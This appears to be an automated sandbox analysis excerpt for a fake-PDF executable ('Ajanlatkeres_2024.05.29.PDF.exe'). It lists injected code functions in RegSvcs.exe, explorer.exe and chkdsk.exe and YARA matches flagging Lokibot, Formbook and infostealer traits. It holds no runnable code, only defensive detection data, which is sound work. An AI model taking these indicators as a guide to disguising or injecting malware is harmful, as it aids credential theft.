Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBDAC6	19_2_00FBDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F55AA0	19_2_00F55AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FADAAC	19_2_00FADAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB1AA3	19_2_00FB1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F83A6C	19_2_00F83A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCFA49	19_2_00FCFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC7A46	19_2_00FC7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F85BF0	19_2_00F85BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F4DBF9	19_2_00F4DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2FB80	19_2_00F2FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCFB76	19_2_00FCFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCFCF2	19_2_00FCFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F89C32	19_2_00F89C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2FDC0	19_2_00F2FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC7D73	19_2_00FC7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC1D5A	19_2_00FC1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F13D40	19_2_00F13D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F19EB0	19_2_00F19EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00ED3FD5	19_2_00ED3FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00ED3FD2	19_2_00ED3FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCFFB1	19_2_00FCFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F11F92	19_2_00F11F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCFF09	19_2_00FCFF09
Source: C:\Windows\explorer.exe	Code function: 20_2_101E1232	20_2_101E1232
Source: C:\Windows\explorer.exe	Code function: 20_2_101E0036	20_2_101E0036
Source: C:\Windows\explorer.exe	Code function: 20_2_101D7082	20_2_101D7082
Source: C:\Windows\explorer.exe	Code function: 20_2_101DE912	20_2_101DE912
Source: C:\Windows\explorer.exe	Code function: 20_2_101D8D02	20_2_101D8D02
Source: C:\Windows\explorer.exe	Code function: 20_2_101DBB30	20_2_101DBB30
Source: C:\Windows\explorer.exe	Code function: 20_2_101DBB32	20_2_101DBB32
Source: C:\Windows\explorer.exe	Code function: 20_2_101E45CD	20_2_101E45CD
Source: C:\Windows\explorer.exe	Code function: 20_2_107B2036	20_2_107B2036
Source: C:\Windows\explorer.exe	Code function: 20_2_107A9082	20_2_107A9082
Source: C:\Windows\explorer.exe	Code function: 20_2_107B0912	20_2_107B0912
Source: C:\Windows\explorer.exe	Code function: 20_2_107AAD02	20_2_107AAD02
Source: C:\Windows\explorer.exe	Code function: 20_2_107B65CD	20_2_107B65CD
Source: C:\Windows\explorer.exe	Code function: 20_2_107B3232	20_2_107B3232
Source: C:\Windows\explorer.exe	Code function: 20_2_107ADB32	20_2_107ADB32
Source: C:\Windows\explorer.exe	Code function: 20_2_107ADB30	20_2_107ADB30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05490535	21_2_05490535
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05550591	21_2_05550591
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05542446	21_2_05542446
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05534420	21_2_05534420
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0553E4F6	21_2_0553E4F6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054B4750	21_2_054B4750
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05490770	21_2_05490770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0548C7C0	21_2_0548C7C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054AC6E0	21_2_054AC6E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05518158	21_2_05518158
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05480100	21_2_05480100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0552A118	21_2_0552A118
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_055481CC	21_2_055481CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_055441A2	21_2_055441A2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_055501AA	21_2_055501AA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05522000	21_2_05522000
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554A352	21_2_0554A352
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_055503E6	21_2_055503E6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0549E3F0	21_2_0549E3F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05530274	21_2_05530274
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_055102C0	21_2_055102C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0549AD00	21_2_0549AD00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0552CD1F	21_2_0552CD1F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0548ADE0	21_2_0548ADE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054A8DBF	21_2_054A8DBF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05490C00	21_2_05490C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05480CF2	21_2_05480CF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05530CB5	21_2_05530CB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05504F40	21_2_05504F40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05532F30	21_2_05532F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054D2F28	21_2_054D2F28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054B0F30	21_2_054B0F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05482FC8	21_2_05482FC8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0549CFE0	21_2_0549CFE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0550EFA0	21_2_0550EFA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05490E59	21_2_05490E59
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554EE26	21_2_0554EE26
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554EEDB	21_2_0554EEDB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554CE93	21_2_0554CE93
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054A2E90	21_2_054A2E90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054A6962	21_2_054A6962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054929A0	21_2_054929A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0555A9A6	21_2_0555A9A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0549A840	21_2_0549A840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05492840	21_2_05492840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054BE8F0	21_2_054BE8F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054768B8	21_2_054768B8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554AB40	21_2_0554AB40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05546BD7	21_2_05546BD7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0548EA80	21_2_0548EA80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05547571	21_2_05547571
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_055595C3	21_2_055595C3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0552D5B0	21_2_0552D5B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05481460	21_2_05481460
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554F43F	21_2_0554F43F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554F7B0	21_2_0554F7B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054D5630	21_2_054D5630
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_055416CC	21_2_055416CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054C516C	21_2_054C516C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0547F172	21_2_0547F172
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0555B16B	21_2_0555B16B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0549B1B0	21_2_0549B1B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054970C0	21_2_054970C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0553F0CC	21_2_0553F0CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554F0E0	21_2_0554F0E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_055470E9	21_2_055470E9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0547D34C	21_2_0547D34C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554132D	21_2_0554132D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054D739A	21_2_054D739A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054AB2C0	21_2_054AB2C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_055312ED	21_2_055312ED
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054952A0	21_2_054952A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05493D40	21_2_05493D40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05541D5A	21_2_05541D5A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05547D73	21_2_05547D73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054AFDC0	21_2_054AFDC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05509C32	21_2_05509C32
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554FCF2	21_2_0554FCF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554FF09	21_2_0554FF09
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05453FD5	21_2_05453FD5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05453FD2	21_2_05453FD2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05491F92	21_2_05491F92
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554FFB1	21_2_0554FFB1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05499EB0	21_2_05499EB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05499950	21_2_05499950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054AB950	21_2_054AB950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05525910	21_2_05525910
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054FD800	21_2_054FD800
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054938E0	21_2_054938E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554FB76	21_2_0554FB76
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05505BF0	21_2_05505BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054CDBF9	21_2_054CDBF9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054AFB80	21_2_054AFB80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05547A46	21_2_05547A46
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0554FA49	21_2_0554FA49
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05503A6C	21_2_05503A6C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0553DAC6	21_2_0553DAC6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054D5AA0	21_2_054D5AA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05531AA3	21_2_05531AA3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0552DAAC	21_2_0552DAAC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4F030	21_2_00A4F030
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4E56B	21_2_00A4E56B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4D684	21_2_00A4D684
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4EB3B	21_2_00A4EB3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A32D90	21_2_00A32D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A4EEAC	21_2_00A4EEAC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A39E60	21_2_00A39E60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_00A32FB0	21_2_00A32FB0

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 054FEA12 appears 86 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 054C5130 appears 58 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0550F290 appears 105 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0547B970 appears 280 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 054D7E54 appears 110 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00F7EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00405B6F appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00EFB970 appears 280 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00F45130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00F8F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00F57E54 appears 110 times

Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1326006621.0000000004105000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Ajanlatkeres_2024.05.29.PDF.exe
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1333822284.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Ajanlatkeres_2024.05.29.PDF.exe
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamejORR.exe0 vs Ajanlatkeres_2024.05.29.PDF.exe
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1330740673.0000000007200000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Ajanlatkeres_2024.05.29.PDF.exe
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1321124452.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Ajanlatkeres_2024.05.29.PDF.exe
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000000.1276409150.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEusz.exe0 vs Ajanlatkeres_2024.05.29.PDF.exe
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Ajanlatkeres_2024.05.29.PDF.exe
Source: Ajanlatkeres_2024.05.29.PDF.exe	Binary or memory string: OriginalFilenameEusz.exe0 vs Ajanlatkeres_2024.05.29.PDF.exe

Source: Ajanlatkeres_2024.05.29.PDF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
